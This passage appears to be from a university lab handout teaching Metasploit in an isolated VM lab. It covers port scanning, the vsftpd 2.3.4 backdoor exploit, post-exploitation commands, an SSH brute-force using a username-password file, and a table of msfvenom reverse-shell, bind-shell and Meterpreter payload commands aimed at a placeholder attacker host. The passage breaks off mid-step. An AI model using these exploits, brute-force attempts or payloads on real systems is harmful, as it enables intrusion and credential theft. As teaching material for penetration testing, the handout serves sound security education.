- Post Modules: Used for post-exploitation activities like privilege escalation and data extraction.

2. Starting Metasploit

- For this part we only need Admin vm and Meta, you could use more but let's keep it simple for now. So make sure that:

- CSF_VM1 and Meta are up and running and connected to your NAT

Opening Metasploit Console

Command:

sudo msfconsole

- This command launches Metasploit with administrative privileges. msfconsole is the main interface where you interact with Metasploit.

Exploring the Metasploit Console

- After launching, you’ll see a banner and a prompt (`msf >`). This is where you input commands.

Familiarising with Basic Commands

- Commands:

  - `help`: Lists all commands.
  - `search <term>`: Searches for modules by keyword (e.g., `search ssh`).
  - `info <module>`: Provides detailed information about a module.
  - `use <module>`: Loads a module.
  - `show options`: Lists required and optional parameters.
  - `set <option> <value>`: Sets a value (e.g., `set RHOSTS <meta_victim_IP>`).
  - `back`: Exits the current module.

Basic Metasploit Commands

Checking Version

version

- Displays the current version of Metasploit, so you can check whether it is up to date.

Searching for Modules

search scanner

- The `search` command lets you find specific modules within Metasploit. Here, searching for `scanner` lists all scanner modules available (e.g., port scanners, vulnerability scanners).

Getting Information About a Module

Command:

info auxiliary/scanner/portscan/tcp

- Provides details about the specified module, including options you need to set, what the module does, and any requirements. This is essential to understand how a module works before using it.

Using Auxiliary Modules for Network Scanning

- Module: `auxiliary/scanner/portscan/tcp`

- Steps:

  - Load the Module:

use auxiliary/scanner/portscan/tcp

  - Set Target Range (the entire subnet, ports 1-1000). Enter each command on its own line and without a trailing comment, because the console treats everything after the option name as the value:

set RHOSTS <network_prefix>/24

set PORTS 1-1000

  - Run the Module:

run

- Expected Outcome: A list of live hosts and their open ports, narrowing down potential targets.
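The port-scan steps above can also be kept in a file and replayed. The following is a minimal sketch, assuming `msfconsole` is started with its `-r` option to read a resource file and `-q` to skip the banner. The function name `write_portscan_rc` and the file name `portscan.rc` are hypothetical, chosen only for this illustration.

```shell
#!/usr/bin/env bash
# write_portscan_rc TARGET PORTS OUTFILE
# Writes the console commands for the TCP port-scan module into a
# resource file, one command per line.
write_portscan_rc() {
    local target="$1" ports="$2" outfile="$3"
    cat > "$outfile" <<EOF
use auxiliary/scanner/portscan/tcp
set RHOSTS $target
set PORTS $ports
run
EOF
}

# Example (inside the lab network only):
#   write_portscan_rc "<network_prefix>/24" "1-1000" portscan.rc
#   sudo msfconsole -q -r portscan.rc
```

Keeping the commands in a file makes a scan repeatable and leaves a record of exactly which targets and ports were used.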

Service Version Detection

- Objective: Identify specific services running on `meta_victim`.

- Module: `auxiliary/scanner/portscan/tcp` (continued)

- Steps:

  - Run a targeted scan of the common service ports:

set RHOSTS <meta_victim_IP>

set PORTS 21,22,80

run

- Expected Outcome: Confirmation of which of the selected ports are open (e.g., FTP on port 21, SSH on port 22). This module reports open ports only, so refer to the earlier Nmap `-A` output for the service versions.

Exploiting Vulnerabilities with an Exploit Module

- Objective: Perform exploitation of a vulnerable service on `meta_victim`.

- Module: `exploit/unix/ftp/vsftpd_234_backdoor`

- Steps:

  - Load Exploit:

use exploit/unix/ftp/vsftpd_234_backdoor

  - Set Options:

set RHOSTS <meta_victim_IP>

  - Run Exploit:

exploit

- Expected Outcome: Successful exploitation and session creation with `meta_victim`.

Post-Exploitation Basics

- Objective: Familiarise yourself with post-exploitation commands in Metasploit.

- Commands:

  - `sessions -l`: Lists active sessions.
  - `sessions -i <session_id>`: Interacts with a specific session.

- Within the Session:

  - `sysinfo`: Displays system information (available in Meterpreter sessions).
  - `pwd`: Displays the current working directory.
  - `ls`: Lists files and directories.
  - `download <file>`: Downloads a specific file from `meta_victim` (available in Meterpreter sessions).

- Exit Session:

exit

- Expected Outcome: You understand how to interact with and gather information from the target.

Clean Up and Exit

Safely closing all sessions and exiting Metasploit.

- Commands:

  - `sessions -K`: Kills all active sessions.
  - `exit`: Exits the Metasploit console.

FYI

Exploring More Modules: Listing All Available Exploits

Command:

show exploits

- Lists all exploit modules available in Metasploit. You should explore these modules to understand how different services and vulnerabilities are targeted.

Listing Payloads: FYI

Command:

show payloads

- Shows available payloads that can be paired with exploits. This helps you learn which payloads are suitable for different operating systems and conditions.

| Example of Payload | Purpose |
|---|---|
| `msfvenom -p windows/shell_reverse_tcp LHOST=<attacker_ip> LPORT=<attacker_port> -f exe -o reverse_shell.exe` | Windows reverse shell that connects back to the attacker. |
| `msfvenom -p linux/x86/shell_reverse_tcp LHOST=<attacker_ip> LPORT=<attacker_port> -f elf -o reverse_shell.elf` | Linux x86 reverse shell that connects back to the attacker. |
| `msfvenom -p windows/shell_bind_tcp LPORT=<target_port> -f exe -o bind_shell.exe` | Windows bind shell that listens on a port on the target. |
| `msfvenom -p linux/x86/shell_bind_tcp LPORT=<target_port> -f elf -o bind_shell.elf` | Linux x86 bind shell that listens on a port on the target. |
| `msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=<attacker_port> -f exe -o meterpreter_reverse_shell.exe` | Windows Meterpreter payload that connects back to the attacker. |
| `msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=<attacker_port> -f elf -o meterpreter_reverse_shell.elf` | Linux x86 Meterpreter payload that connects back to the attacker. |
| `msfvenom -p windows/meterpreter/bind_tcp LPORT=<target_port> -f exe -o meterpreter_bind_shell.exe` | Windows Meterpreter payload that listens on a port on the target. |
| `msfvenom -p linux/x86/meterpreter/bind_tcp LPORT=<target_port> -f elf -o meterpreter_bind_shell.elf` | Linux x86 Meterpreter payload that listens on a port on the target. |
| `msfvenom -p php/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=<attacker_port> -f raw -o payload.php` | PHP Meterpreter payload that connects back to the attacker. |
| `msfvenom -p javascript/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=<attacker_port> -f js -o payload.js` | JavaScript Meterpreter payload that connects back to the attacker. |
| `msfvenom -p windows/exec CMD=<command> -f exe -o exec_command.exe` | Executes a command on the target Windows system. |
| `msfvenom -p linux/x86/exec CMD=<command> -f elf -o exec_command.elf` | Executes a command on the target Linux system. |

Part-3: Exploiting SSH Using Metasploit (This task is related to Part-2 of your Assessment-1)

1. Setup Requirements

- Target Machine: use any of the aforementioned VMs (Meta is recommended).

- Attacking Machine: use AdminVM (CSF_VM1).

2. Opening Metasploit and Searching for SSH Exploits

Launch Metasploit

Command:

sudo msfconsole

- Metasploit must be run with administrative privileges because it needs access to network resources and system services. `msfconsole` is the interactive command-line interface where you will input commands.

Search for SSH Modules

search ssh

- Why This Matters: This command searches Metasploit’s database for any modules related to SSH. SSH is a common service used for remote access, and it’s often targeted because weak or default credentials can be exploited. The search will return a list of modules, including scanners, brute-forcers, and specific exploits that might target SSH vulnerabilities.

3. Selecting and Understanding the SSH Brute Force Module

Startup

- Open a Terminal on your attacker machine (`csf_vm1`).

- Run the following command to scan all TCP ports on the target IP address:

nmap -p1-65535 -A <your victim machine IP address>

- Explanation:

  - `nmap`: Runs the Nmap tool, commonly used in network scanning.
  - `-p1-65535`: Scans all 65,535 TCP ports.
  - `-A`: Enables aggressive scanning options, including OS detection, service version detection, script scanning, and traceroute.

- Review the Output:

- Identify any open ports and the services running on them.

- Note any additional information, such as OS version and network details, as they may be useful for further steps in the pentest.

Alternatively, you can use the following command (a TCP SYN scan) to list only the open ports:

sudo nmap -sS <victim IP address>

Please review your output.
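When reviewing a long scan, it can help to reduce the report to a list of open ports. The sketch below assumes the scan was saved in Nmap's grepable format with `-oG` to a hypothetical file `scan.gnmap`, and that no service field in the report contains a comma (true for a plain `-sS` scan, not guaranteed when version detection is on). The function name `open_ports` is illustrative.

```shell
#!/usr/bin/env bash
# Sketch: list open ports from a grepable Nmap report.
# Assumes the report was written beforehand, for example:
#   sudo nmap -sS -oG scan.gnmap <victim IP address>

# open_ports FILE
# Each port entry in the "Ports:" field has the form
#   port/state/protocol/owner/service/...
# Prints "port/protocol service" for every entry whose state is "open".
open_ports() {
    grep "Ports:" "$1" \
        | sed 's/.*Ports: //' \
        | tr ',' '\n' \
        | sed 's/^ *//' \
        | awk -F/ '$2 == "open" { print $1 "/" $3 " " $5 }'
}
```

Running `open_ports scan.gnmap` gives one line per open port, which is a convenient checklist when deciding which service to examine next.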

Search for SSH modules:

Run the following command in the Metasploit console to search for the SSH login module:

search ssh_login

Choose the SSH Login Module

Command:

use auxiliary/scanner/ssh/ssh_login

- What This Does: This command loads the SSH login module, a tool for brute-forcing SSH credentials. It is categorised as an auxiliary module, meaning it performs actions like scanning or credential testing without directly exploiting a vulnerability.

- Learning Objective: You learn how to load a specific Metasploit module and understand the difference between auxiliary modules (like scanners or brute forcers) and exploit modules (which directly target vulnerabilities).

View the Available Options

- Run the following command to see the module options:

show options

- Review the Output and take note of the key options, including:

  - `RHOSTS`: The target IP address (e.g., `192.168.127.154`).
  - `USERNAME`: Set a single username, or use `USER_FILE` to specify a file with multiple usernames.
  - `PASSWORD`: Set a single password, or use `PASS_FILE` to specify a file with multiple passwords.
  - `STOP_ON_SUCCESS`: Choose whether to stop once a successful login is found (set to `true` if desired).
  - Q: Why would we want this set to true?

4. Configuring the Module

Set the Target IP Address (RHOSTS), as shown earlier with set RHOSTS <meta_victim_IP>.

Set the Username and Password: Specify the User-Pass File

Instead of using separate username and password files, we will be using a single USERPASS_FILE.

- Set `USERPASS_FILE` to the pre-configured file containing username-password pairs. This file is located in your home directory and named `user_pass.txt`, so set it as follows (adjust the path and file name if they differ on your VM):

set USERPASS_FILE /home/usr_pass.txt
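The `USERPASS_FILE` option expects one username and one password per line, separated by a space. As a minimal sketch of a sanity check before running the module, the hypothetical helper below reports any line that does not have exactly two fields. It will also flag blank lines and passwords that contain spaces, so treat a report as a prompt to look at the line, not as proof that it is wrong.

```shell
#!/usr/bin/env bash
# check_userpass_file FILE
# Prints the number of each line that is not of the form
# "username password" and returns non-zero if any were found.
check_userpass_file() {
    awk 'NF != 2 { print "line " NR ": expected 2 fields, found " NF; bad = 1 }
         END { exit bad + 0 }' "$1"
}
```

For example, `check_userpass_file ~/user_pass.txt` prints nothing and returns success when every line is a well-formed pair.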

Optional Parameters

Commands:

set STOP_ON_SUCCESS true

set VERBOSE true

- STOP_ON_SUCCESS: If set to `true`, this parameter stops the attack when a valid login is found, preventing unnecessary attempts and reducing detection risk.

- VERBOSE: If enabled, it shows detailed output for each login attempt, helping you see the module’s activity in real time.

5. Running the SSH Brute Force Module

Execute the Module by either:

run

OR

exploit

- This command starts the brute force attack. Metasploit will attempt to log in to the target using each username-password pair provided. If successful, it will display a message indicating the credentials that worked.

It will take a few minutes, but you should get something like:

.

.

.

.

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed
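With `VERBOSE` enabled, the successful attempt can be buried among many failed ones. The sketch below assumes the console output was saved to a hypothetical file (for example with the console's `spool` command) and relies on the Metasploit convention of prefixing successes with `[+]` and failures with `[-]`. The function name and the sample lines used to exercise it are illustrative and are not real lab output.

```shell
#!/usr/bin/env bash
# summarise_logins FILE
# Counts the success ([+]) and failure ([-]) lines in saved console
# output, then prints the success lines themselves.
summarise_logins() {
    local ok failed
    ok=$(grep -c -F '[+]' "$1" || true)
    failed=$(grep -c -F '[-]' "$1" || true)
    echo "successful: $ok, failed: $failed"
    grep -F '[+]' "$1" || true
}
```

Calling `summarise_logins ssh_login.log` on the saved output gives a one-line tally followed by any credentials the module reported as valid.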

6. Accessing the Target System Using SSH

After successfully exploiting the SSH login on the target machine, we can interact with the session to investigate further.

- Check for an Active Session: